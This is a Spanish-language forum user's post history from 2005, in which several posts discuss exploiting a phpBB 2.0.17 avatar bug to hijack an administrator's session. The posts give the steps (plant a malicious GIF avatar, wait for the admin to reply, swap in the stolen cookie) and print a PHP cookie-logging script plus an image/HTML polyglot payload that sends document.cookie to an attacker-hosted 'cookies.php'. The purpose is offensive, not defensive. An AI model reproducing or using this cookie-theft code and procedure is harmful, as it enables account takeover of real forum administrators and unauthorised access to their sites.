últimos mensajes de: jeancarl00

Mostrar Mensajes
Páginas: [1]

1	Seguridad Informática / Nivel Web / Re: Nuevo bug en los phpbb<=2.0.17	en: 13 Noviembre 2005, 04:59 am
a ver si me explico mas claro 1eros pasos subir tus archivos a tu host cookies.php imagen.gif luego buscar el foro vuln e insertar en el avatar la imagen (eso lo haces en tu perfil ) luego postear y esperar q el admin te conteste esos pasos ya los hice me falta cambiar mi cookie x la del admin (yo uso el IEview para modificarla ) pero he aki el problema .. x cual cookie la reemplazamos si no se ha creado el famoso log.txt ( se supone q de ahi es donde sacamos la info de la cookie ) esto es lo q me sale cuando me logeo y veo mi url del avatar pero es la mia , la del admin no (testee con el foro q pusieron arriba) ojala aclaren mis dudas ,,, de antemano thx

2	Seguridad Informática / Nivel Web / Re: Nuevo bug en los phpbb<=2.0.17	en: 13 Noviembre 2005, 02:49 am
mousehack no podemos cambiar la cookie xq no se ha creado el log.txt esa es nuestro problema ahora toy q pruebo con el foro q ta arriba ya les cuento q paso ------------------------------------------- aver si alguien me ayuda y entra al post q puse http://usuarios.lycos.es/ivaneilu/phpBB2/viewtopic.php?p=9#9

3	Seguridad Informática / Nivel Web / Re: Nuevo bug en los phpbb<=2.0.17	en: 12 Noviembre 2005, 21:58 pm
la cookie se ve en el log.txt y luego tienes q modificar tu cookie y reeemplazarla x la q tienes en tu log.txt

Seguridad Informática / Nivel Web / Re: Nuevo bug en los phpbb<=2.0.17

en: 12 Noviembre 2005, 21:50 pm

Código:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt'); // chmod 777 and same directory
fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' ');
fclose($fp);
?>

esto crea el archivo log.txt
si se fijan en esta linea $cookie=$_GET['c']; // ese 'c' se repite en el codigo del avatar y es x esa variable q pasan los parametros

Código:

<GIF89aŸ8÷™fÿ™™><html><head><script>alert('http://yoursite/cookies.php?c='+document.cookie);</script></head></html>

no programo en php pero creo entender un poco el codigo
sime he ekivokado xfavor corriganme

5	Seguridad Informática / Nivel Web / Re: Nuevo bug en los phpbb<=2.0.17	en: 9 Noviembre 2005, 19:04 pm
a mi me pasa esto cuando subo el avatar Código: El avatar debe tener menos de 100 pixels de ancho por 100 pixels de alto alguna idea para poder pasar los tamaños q te imponen ----------------------------------------------------------------- encontre una donde me dejo subir el avatar y cree un post donde me respondio el admin pero no veo el log.txt en mi ftp

Páginas: [1]